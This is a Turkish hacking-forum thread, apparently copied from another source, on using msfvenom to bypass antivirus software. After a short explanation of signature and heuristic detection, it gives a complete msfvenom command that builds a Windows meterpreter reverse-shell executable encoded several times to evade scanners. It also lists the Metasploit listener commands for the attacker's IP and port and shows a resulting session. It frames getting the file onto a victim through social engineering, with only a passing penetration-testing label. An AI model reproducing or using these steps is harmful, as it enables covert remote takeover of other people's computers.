İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

MSFVenom İle Anti-virüs Baypass (Dev Konu.)

30-03-2016 17:24
#1
Üyelik tarihi:
01/2016
Mesajlar:
92
Teşekkür (Etti):
14
Teşekkür (Aldı):
1
Konular:
44
Antivirüs programını atlatmak için antivirüs programını tanımalıyız. Antivirüs programları bir sandbox ortamı kurarak dosyayı bu alanda çalıştırır ve burada uygulamanın hareketlerini kendince ölçer. Çalışma anında ise nereden dosya okuduğunu, nereye yazdığını kontrol etmektedir (örn. Registerlar, …). Bazende daha önce tespit ettiği virüs uygulamasına imza kontrolu ile müdahale etmektedir.





Bir çok antivirüs teknolojisi olmasına rağmen bu yazılımlar temelde iki şekilde çalışır:
İmza tabanlı (Signature Based) (hızlı sonuç)
Sezgisel (heuristic)
Antivirüs yazılımları her ne kadar şüpheli davranışları tespit etmek için sezgisel yeteneklere sahip olduklarını söylemiş olsalar da gerçekte eskiden beri süre gelen imza tabanlı tespittir. Antivirüs teknolojisi bünyesinde önceden bildirilmiş ve ilgili virüsü kimliklendiren bir imzaya sahiptir. Böylece antivirüs yazılımı daha önceden bildiği virüsü uygulamayı tarayarak kolayca yakalayabilmektedir.


Bilgisayar Virüsü Nedir?
Bilgisayar virüsü, kullanıcının izni ya da bilgisi dahilinde olmadan bilgisayarın çalışma şeklini değiştiren ve kendini diğer dosyaların içerisinde gizlemeye çalışan aslında bir tür bilgisayar programıdır.

Sızma testlerinde, antivirüs atlatılarak hedef sistem ele geçirmek istenilebilir ve bu zararlı kodlar kurban bilgisayarına yerleştirilmek istenebilir. Antivirüs atlatmak için kullanılan teknikler genellikle encode ederek yapılmaktadır. Hacker genelde çalışan dosya akışını müdahale ederek istediği yönlendirmeyi yapmaktadır. Hacker antivirüse takılmamak için çalıştırabilir dosyayı encode eder. Çalıştırılabilir dosya içine küçük decoder programlar yerleştirilir. Uygulama çalışma anında virüs programını decode ederek virüs programı aktif hale getirecektir. Antivirüs encode edilmiş kodları yorumladığından (decode etmediğinden) dosyaya müdahele edemiyecektir. Bundan dolayı uygulamanın zararlı olmadığını düşünecektir.

Aşağıdaki resimde gösterildiği gibi solda normal uygulama, sağda encode edilmiş uygulamanın yapısı gösterilmiştir. En alt kısımda uygulamaya çalışmaya başladığında çözen kısım bulunmaktadır. Çalışma anında ise uygulamanın orjinal hali aktif olacaktır. Yani çalışma anında uygulama sol taraftaki olduğunu düşünebiliriz.



Sızma testlerinde veya sosyal mühendislik testlerinde, kurban bilgisayara ****sploit’in payload’u olan meterpreter ile shell açılabilmektedir. Bunun için oluşturacağımız payload antivirüs programlarına takılmaktadır. Bunu atlatmak için belirttiğimiz gibi encode etme tekniklerini uygulayacağız.

****sploit framework yardımıyla bir arka kapı oluşturacağız. Bir şekilde üretilen dosya (encode edilmemiş kod ) antivirus programına takılacağından üretilen dosyayı encode edeceğiz. Önce ****sploit yardımıyla bir arka kapı oluşturalım. Bu dosya windowsda çalışabilir bir dosya üretecektir. Bu dosya çalıştıktan sonra reverse bağlantı ile bize 4444 portu üzerinden bizimle bağlantı oluşturacaktır.

Msfvenom Nedir?
Msfvenom, ****sploit ile gelen zararlı kod üretmek ve kurban pc’den reverse bağlantı sağlayan bir araçtır. Reverse shell açabilmek için oluşturulan dosya karşı tarafta çalıştırılması gerekmektedir. Bunun için sosyal mühendislik yöntemleri gereklidir.

Msfvenom Kullanımı
Msfvenom ile arka kapı oluşturma;




Msfvenom ile oluşturulan dosyayı virustotal’a yükleyelim. (Virustotal farklı antivirüs programlarının bulunduğu, dosya taraması yapan bir web sitedir.)




Virustotal dosyanın 36 farklı antivirüs programı tarafından zararlı yazılım içerdiğini tespit etti.

Msfvenomla zararlı yazılım ve shellcode ürettiğimiz gibi, encode da edilebilmektedir.




Rank satırlarında encoder güçlüklerini belirtmektedir. Biz burada excellent encoder frame’lerini kullanacağız.
Encode işlemini birden fazla yapmak için –i veya –iterations parametlerini kullanılır. Bu işlemler yapıldığı antivirus firmaları tarafından bilindiğinden ve virüs yazılımları imza veritabanlarında bulunduğundan bulmaları kolay olabilir. Bunu atlatabilmek için farklı encode tekniklerini aynı dosya üzerinde çalıştırabiliriz.


root@kali: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.13 LPORT=4444 -f raw –e x86/shikata_ga_nai -i 5 | msfvenom -a x86 –f --platform windows –e x86/countdown –i 8 –f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe –o btriskpayload.exe




Oluşan payload’u virustotal yüklendiğinde daha fazla antivüs atlatı. Fakat bazıları payload’u yakalayabiliyor.

Reverse Shell Açma
Zararlı yazılım oluşturuldu, ama bunu kontrol edecek bir durum yoksa bir işe yaramaz. Uzaktan kontrol edebilmek için ****sploit ile kurban bilsayarı arasında session kurmamızdır.
Msfconsole açtıktan sonra


msf exploit (handler) > use exploit/multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.2.13 // saldırgan IP
msf exploit (handler) > set LPORT 4444 // saldırgan port
msf exploit (handler) > exploit //dinleme modu




Kurban makinede açılan zararlı yazılım bize istekte bulunacaktır. Otomatik olarak geçiş yapacaktır. Çok fazla kurban cihazı olduğunda session listelenen oturumlardan seçim yapılabilmektedir. Dinleme modu başlatırken kullanılan komut şu şekilde olacaktır.


meterpreter > background

msf exploit(handler) > sessions –l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444


msf exploit(handler) > sessions –i 1[*] Starting interaction with 1...

meterpreter >


NOT: ALINTIDIR.

30-03-2016 17:26
#2
SeNSe! - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
root@
Yaş:
23
Mesajlar:
872
Teşekkür (Etti):
260
Teşekkür (Aldı):
223
Konular:
53
ben Msfencode komutuyla yapılıyor diye biliyordum ama buda bi başka yol sanırım
Kullanıcı İmzası
Güç sadece ona ulaşmak isteyen insanlara aittir!


Eski Nick > Furkank60


30-03-2016 17:28
#3
Üyelik tarihi:
01/2016
Mesajlar:
92
Teşekkür (Etti):
14
Teşekkür (Aldı):
1
Konular:
44
Alıntı:
Furkank60´isimli üyeden Alıntı Mesajı göster
ben Msfencode komutuyla yapılıyor diye biliyordum ama buda bi başka yol sanırım
Evet kali gibi işletim sistemlerinde (pentesyon) için kullanılanlarda birçok bypass tekniği vardır.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı